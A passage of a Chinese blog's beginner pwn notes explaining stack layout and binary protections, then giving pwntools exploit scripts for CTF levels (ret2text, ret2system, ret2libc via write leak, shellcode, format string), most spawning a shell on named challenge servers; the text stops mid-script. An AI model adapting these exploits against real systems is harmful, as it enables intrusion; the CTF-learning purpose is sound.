<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ton_andy.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"./public/search.xml"};
  </script>

  <meta name="description" content="简述1栈（stack）：存放局部变量，如函数的参数、返回地址、局部变量等，有系统自动分配和释放">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn入门到放弃笔记">
<meta property="og:url" content="https://ton_andy.gitee.io/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="dong&#39;s blog">
<meta property="og:description" content="简述1栈（stack）：存放局部变量，如函数的参数、返回地址、局部变量等，有系统自动分配和释放">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwgy1gjy806tdwkj30cs0bpmx8.jpg">
<meta property="article:published_time" content="2022-01-15T12:58:15.000Z">
<meta property="article:modified_time" content="2022-01-15T13:16:06.513Z">
<meta property="article:author" content="dong">
<meta property="article:tag" content="sec">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://tva1.sinaimg.cn/large/0081Kckwgy1gjy806tdwkj30cs0bpmx8.jpg">

<link rel="canonical" href="https://ton_andy.gitee.io/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>pwn入门到放弃笔记 | dong's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">dong's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">兴趣使人进步</p>
      <a>
        <img class="custom-logo-image" src="/uploads/logo.png" alt="dong's blog">
      </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pwn入门到放弃笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-01-15 20:58:15 / Modified: 21:16:06" itemprop="dateCreated datePublished" datetime="2022-01-15T20:58:15+08:00">2022-01-15</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sec/" itemprop="url" rel="index"><span itemprop="name">sec</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="简述1"><a href="#简述1" class="headerlink" title="简述1"></a>简述1</h1><p>栈（stack）：存放局部变量，如函数的参数、返回地址、局部变量等，有系统自动分配和释放</p>
<span id="more"></span>
<p>堆栈数据结构的两种基本操作：</p>
<ul>
<li>PUSH：将数据压入栈顶</li>
<li>POP ：将栈顶数据弹出</li>
</ul>
<p>栈增长方向：高地址-&gt;低地址</p>
<p>ESP：栈指针寄存器，指向栈顶的低地址</p>
<p>EBP：基址指针寄存器，指向栈底的高地址</p>
<p>EIP：指令指针，存储即将执行的程序指令的地址</p>
<p>用一个函数的过程大致如下：</p>
<ul>
<li>函数参数从右到左入栈</li>
<li>返回地址入栈</li>
<li>上一函数ebp入栈</li>
</ul>
<p><img src="https://tva1.sinaimg.cn/large/0081Kckwgy1gjy806tdwkj30cs0bpmx8.jpg" alt="img"></p>
<h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><h3 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h3><p><strong>1.Relro：Full Relro（重定位表只读）</strong><br> 　Relocation Read Only， 重定位表只读。重定位表即.got 和 .plt 两个表。<br> <strong>2.Stack：No Canary found（能栈溢出）</strong><br> 　Canary, 金丝雀。金丝雀原来是石油工人用来判断气体是否有毒。而应用于在栈保护上则是在初始化一个栈帧时在栈底（stack overflow 发生的高位区域的尾部）设置一个随机的 canary 值，当函数返回之时检测 canary 的值是否经过了改变，以此来判断 stack/buffer overflow 是否发生，若改变则说明栈溢出发生，程序走另一个流程结束，以免漏洞利用成功。 因此我们需要获取 Canary 的值，或者防止触发 stack_chk_fail 函数，或是利用此函数。<br> <strong>3.NX： NX enable（不可执行内存）</strong><br> 　Non-Executable Memory，不可执行内存。了解 Linux 的都知道其文件有三种属性，即 rwx，而 NX 即没有 x 属性。如果没有 w 属性，我们就不能向内存单元中写入数据，如果没有 x 属性，写入的 shellcode 就无法执行。所以，我们此时应该使用其他方法来 pwn 掉程序，其中最常见的方法为 ROP (Return-Oriented Programming 返回导向编程)，利用栈溢出在栈上布置地址，每个内存地址对应一个 gadget，利用 ret 等指令进行衔接来执行某项功能，最终达到 pwn 掉程序的目的。<br> <strong>4.PIE： PIE enable（开启ASLR 地址随机化）</strong><br> 　Address space layout randomization，地址空间布局随机化。通过将数据随机放置来防止攻击。</p>
<h2 id="记一些命令："><a href="#记一些命令：" class="headerlink" title="记一些命令："></a>记一些命令：</h2><p>查命令地址：<em><strong>readelf -a <a target="_blank" rel="noopener" href="http://libc-2.19.so/">libc-2.19.so</a> | grep “ system@”</strong></em><br>查字符串地质：<em><strong>strings -a -t x <a target="_blank" rel="noopener" href="http://libc-2.19.so/">libc-2.19.so</a> | grep “/bin/sh”</strong></em></p>
<h1 id="level0-溢出直接执行函数地址"><a href="#level0-溢出直接执行函数地址" class="headerlink" title="level0  溢出直接执行函数地址"></a>level0  溢出直接执行函数地址</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">Debug = <span class="number">2</span></span><br><span class="line"><span class="keyword">if</span> Debug:</span><br><span class="line">	io = process(<span class="string">&quot;./level0&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	io = remote(<span class="string">&#x27;pwn2.jarvisoj.com&#x27;</span>,<span class="number">9881</span>) </span><br><span class="line">callsystem_addr = <span class="number">0x400596</span></span><br><span class="line">payload = <span class="number">0x88</span>*<span class="string">&#x27;A&#x27;</span>+p64(callsystem_addr)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h1 id="level2-函数与参数不在一起"><a href="#level2-函数与参数不在一起" class="headerlink" title="level2 函数与参数不在一起"></a>level2 函数与参数不在一起</h1><p>RELRO:    Partial RELRO</p>
<h2 id="x32"><a href="#x32" class="headerlink" title="x32"></a>x32</h2><p>32位的函数在调用栈的时候是：</p>
<p>​    调用函数地址-&gt;函数的返回地址-&gt;参数n-&gt;参数n-1….-&gt;参数1</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">Debug = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> Debug:</span><br><span class="line">    io = process(<span class="string">&quot;./level2&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = remote(<span class="string">&#x27;220.249.52.133&#x27;</span>,<span class="number">56374</span>)</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./level2&#x27;</span>)</span><br><span class="line">sys_addr = elf.symbols[<span class="string">&#x27;system&#x27;</span>]       <span class="comment"># 查找符号地址</span></span><br><span class="line">sh_addr = elf.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>() <span class="comment"># 搜索字符串地址</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x88</span> + <span class="string">&#x27;b&#x27;</span>*<span class="number">4</span> + p32(sys_addr) + <span class="string">&quot;dddd&quot;</span>+ p32(sh_addr)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="X64"><a href="#X64" class="headerlink" title="X64"></a>X64</h2><p>64位程序在调用system函数时，参数的传递方式和32位不一样，32位是通过栈传参，而64位通过edi寄存器传参，所以这时我们的思路变成如何覆盖edi的值，通过基本rop就可以做到，利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi，在执行pop语句时，只要保证栈顶元素是”/bin/sh”的地址，并将返回地址设置为system。</p>
<p>64位的函数在调用栈的时候是：</p>
<p>​    前六个参数按照约定存储在寄存器：rdi,rsi,rdx,rcx,r8,r9中。</p>
<p>​    参数超过六个的时候，第七个会压入栈中，并且先输入函数的返回地址，然后是函数的参数，之后才是函数的调用地址</p>
<p>ROPgadget –binary level2_x64 –only “pop|ret”</p>
<p>ROPgadget –binary level2_x64 –only “pop|ret” |grep ‘rdi’</p>
<p>4006b3 : pop rdi ; ret</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">Debug = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> Debug:</span><br><span class="line">    io = process(<span class="string">&quot;./level2_x64&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = remote(<span class="string">&#x27;8496-de6da972-0df6-4c70-a2eb-2d22f098c05f.node3.buuoj.cn&#x27;</span>,<span class="number">28874</span>)</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./level2_x64&#x27;</span>)</span><br><span class="line">sys_addr = elf.symbols[<span class="string">&#x27;system&#x27;</span>]       <span class="comment"># 查找符号地址</span></span><br><span class="line">sh_addr = elf.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>() <span class="comment"># 搜索字符串地址</span></span><br><span class="line">pop_rdi_addr = <span class="number">0x4006b3</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x80</span> + p64(<span class="number">0</span>) + p64(pop_rdi_addr) +\</span><br><span class="line">     p64(sh_addr) + p64(sys_addr)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h1 id="level3-无system和-bin-sh"><a href="#level3-无system和-bin-sh" class="headerlink" title="level3 无system和/bin/sh"></a>level3 无system和/bin/sh</h1><h2 id="x32-1"><a href="#x32-1" class="headerlink" title="x32"></a>x32</h2><p>还是利用system函数，如何获取system的地址呢，这需要利用到在libc.so文件中各个函数的相对位置和加载到内存中之后各个函数的相对位置相同这一特性来获取。</p>
<p>在程序中发现了，write函数，write函数可以将东西写出来，就可以将write函数在内存中的地址泄露出来，由于system和write函数在libc.so文件中的地址是可以知道的，那么进而就可以知道system在内存中的的地址，同理可以知道”/bin/sh”在内存中的地址，于是就可以调用system(“/bin/sh”)达到获取shell的目的。</p>
<p>plt表中存放的是函数在got表中该项的地址，got表存放的是函数在内存中的真实地址，也就是说plt[write]指向got[write]，got[write]指向write函数在内存中的地址。而plt表在服务器和客户机是一样的</p>
<p>构造write(got[write])</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.binary = <span class="string">&quot;./level3&quot;</span></span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line">context.arch = <span class="string">&#x27;i386&#x27;</span></span><br><span class="line">elf = context.binary</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> sys.argv[<span class="number">1</span>] == <span class="string">&#x27;l&#x27;</span>:</span><br><span class="line">    io = process(<span class="string">&quot;./level3&quot;</span>)</span><br><span class="line">    libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = remote(<span class="string">&quot;8496-28588bde-041e-40a2-9613-659789756ca5.node3.buuoj.cn&quot;</span>, <span class="number">28970</span>)</span><br><span class="line">    libc = ELF(<span class="string">&quot;./libc-2.19.so&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    leak = flat(cyclic(<span class="number">0x88</span> + <span class="number">4</span>), elf.plt[<span class="string">&#x27;write&#x27;</span>], elf.sym[<span class="string">&#x27;_start&#x27;</span>], <span class="number">1</span>, elf.got[<span class="string">&#x27;write&#x27;</span>], <span class="number">4</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Input:\n&quot;</span>, leak)</span><br><span class="line">    libc.address = u32(io.recvuntil(<span class="string">&quot;\xf7&quot;</span>)[-<span class="number">4</span>: ]) - libc.sym[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">    success(<span class="string">&quot;libc -&gt; &#123;:#x&#125;&quot;</span>.<span class="built_in">format</span>(libc.address))</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">    rop = flat(cyclic(<span class="number">0x88</span> + <span class="number">4</span>), libc.sym[<span class="string">&#x27;system&#x27;</span>], <span class="string">&#x27;aaaa&#x27;</span>, <span class="built_in">next</span>(libc.search(<span class="string">&quot;/bin/sh&quot;</span>)))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Input:\n&quot;</span>, rop)</span><br><span class="line"></span><br><span class="line">    io.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="x64-NX-栈不可执行"><a href="#x64-NX-栈不可执行" class="headerlink" title="x64  NX 栈不可执行"></a>x64  NX 栈不可执行</h2><p>前六个整型或指针参数依次保存在 <strong>RDI, RSI, RDX, RCX, R8 和 R9 寄存器</strong>中，如果还有更多的参数的话才会保存在栈上。</p>
<p>只开启了NX保护。<br>没有system函数也没有/bin/sh字符串。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">vulnerable_function</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [rsp+0h] [rbp-80h]</span></span><br><span class="line"></span><br><span class="line">  write(<span class="number">1</span>, <span class="string">&quot;Input:\n&quot;</span>, <span class="number">7uLL</span>);</span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, &amp;buf, <span class="number">0x200</span>uLL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>栈溢出漏洞<br>可以用write函数来泄露<br>查看rop</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary level3_x64 --only &quot;mov|pop|ret&quot;</span><br><span class="line"></span><br><span class="line">0x00000000004006b3 : pop rdi ; ret</span><br><span class="line">0x00000000004006b1 : pop rsi ; pop r15 ; ret</span><br></pre></td></tr></table></figure>

<p>没有rdx ,  下断点，<code>p $rdx</code> 查看rdx值需要大于8 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">from pwn import *</span><br><span class="line"> </span><br><span class="line">elf = ELF(&#x27;level3_x64&#x27;)</span><br><span class="line">Io = remote(&#x27;pwn2.jarvisoj.com&#x27;,9883) #pwn2.jarvisoj.com 9883</span><br><span class="line"> </span><br><span class="line">got_write = elf.got[&#x27;write&#x27;]</span><br><span class="line">main = elf.symbols[&#x27;main&#x27;]</span><br><span class="line">plt_write = elf.symbols[&#x27;write&#x27;]</span><br><span class="line"> </span><br><span class="line">payload1 =  &quot;\x00&quot;* (0x80 + 8)</span><br><span class="line">payload1 += p64(0x00000000004006b3) #pop rdi ; ret</span><br><span class="line">payload1 += p64(1)</span><br><span class="line">payload1 += p64(0x00000000004006b1) #pop rsi ; pop r15 ; ret</span><br><span class="line">payload1 += p64(got_write)</span><br><span class="line">payload1 += p64(1)</span><br><span class="line">payload1 += p64(plt_write)</span><br><span class="line">payload1 += p64(main)</span><br><span class="line"> </span><br><span class="line">Io.recvuntil(&quot;Input:\n&quot;)</span><br><span class="line">Io.send(payload1)</span><br><span class="line">temp = Io.recv(8)</span><br><span class="line">write_addr = u64(temp[0:8])</span><br><span class="line"> </span><br><span class="line">write_libc_address = 0x00000000000eb700  #readelf -a ./libc-2.19.so | grep &quot; write@&quot;</span><br><span class="line">bin_sh_libc_address = 0x17c8c3 #strings -a -t x libc-2.19.so | grep &quot;/bin/sh&quot;</span><br><span class="line">system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep &quot; system@&quot;</span><br><span class="line">exit_libc_address = 0x000000000003c1e0 #readelf -a ./libc-2.19.so | grep &quot; exit@&quot;</span><br><span class="line"> </span><br><span class="line">offset = write_addr - write_libc_address               </span><br><span class="line"> </span><br><span class="line">bin_sh_address = offset + bin_sh_libc_address</span><br><span class="line">system_address = offset + system_libc_address</span><br><span class="line">exit_address = offset + exit_libc_address</span><br><span class="line"> </span><br><span class="line">payload =  &quot;\x00&quot;* (0x80 + 8)</span><br><span class="line">payload += p64(0x00000000004006b3) # pop rdi;ret  #ROPgadget --binary ./level3_x64 --only &quot;pop|ret&quot;</span><br><span class="line">payload += p64(bin_sh_address) # /bin/sh ; argv for system()</span><br><span class="line">payload += p64(system_address) # address of system()</span><br><span class="line">payload += p64(exit_address)</span><br><span class="line"> </span><br><span class="line">Io.send(payload)</span><br><span class="line">Io.interactive()</span><br></pre></td></tr></table></figure>











<h1 id="level1-shellcode"><a href="#level1-shellcode" class="headerlink" title="level1 shellcode"></a>level1 shellcode</h1><p>知道栈的地址；栈内可以执行 NX disabled</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># checksec level1</span></span><br><span class="line">Arch:     i386-32-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX disabled</span><br><span class="line">PIE:      No PIE (0x8048000)</span><br><span class="line">RWX:      Has RWX segments//这里代表有可以执行shellcode的段,和NX有些类似</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;What&#x27;s this:%p?\n&quot;</span>, &amp;buf); <span class="comment">// 输出了buf地址</span></span><br><span class="line"><span class="keyword">return</span> read(<span class="number">0</span>, &amp;buf, <span class="number">0x100</span>u);<span class="comment">// 0:标准输入</span></span><br></pre></td></tr></table></figure>



<p>发现函数调用了printf函数，输出了buf的地址，在结合NX保护是关闭的，那么就意味着，如果将shellcode写到buf中，函数返回时跳转到buf位置，就可以执行shellcode</p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">Debug = <span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> Debug:</span><br><span class="line">	io = process(<span class="string">&quot;./level1&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	io = remote(<span class="string">&#x27;47.107.238.30&#x27;</span>,<span class="number">8888</span>)</span><br><span class="line"></span><br><span class="line">shellcode_addr=<span class="built_in">int</span>(io.readline()[<span class="built_in">len</span>(<span class="string">&quot;What&#x27;s this:&quot;</span>):-<span class="number">2</span>],<span class="number">16</span>)</span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line"></span><br><span class="line">payload = shellcode.ljust(<span class="number">0x8c</span>,<span class="string">&#x27;A&#x27;</span>) + p32(shellcode_addr)</span><br><span class="line">payload = flat(shellcode,<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x88</span>-<span class="built_in">len</span>(shellcode)),<span class="number">0</span>,addr)</span><br><span class="line"></span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>





<h1 id="fmt-x64-格式化字符串漏洞"><a href="#fmt-x64-格式化字符串漏洞" class="headerlink" title="fmt x64 格式化字符串漏洞"></a>fmt x64 格式化字符串漏洞</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(</span><br><span class="line">    log_level=<span class="string">&#x27;debug&#x27;</span>,</span><br><span class="line">    arch=<span class="string">&#x27;amd64&#x27;</span>,<span class="comment">#&quot;i386&quot;</span></span><br><span class="line">    os=<span class="string">&#x27;linux&#x27;</span>,</span><br><span class="line">    <span class="comment"># terminal = [&#x27;tmux&#x27;,&#x27;splitw&#x27;,&#x27;-h&#x27;]</span></span><br><span class="line">)</span><br><span class="line"><span class="comment">#p = remote(&quot;81.69.0.47&quot;,2222)</span></span><br><span class="line">p = process(<span 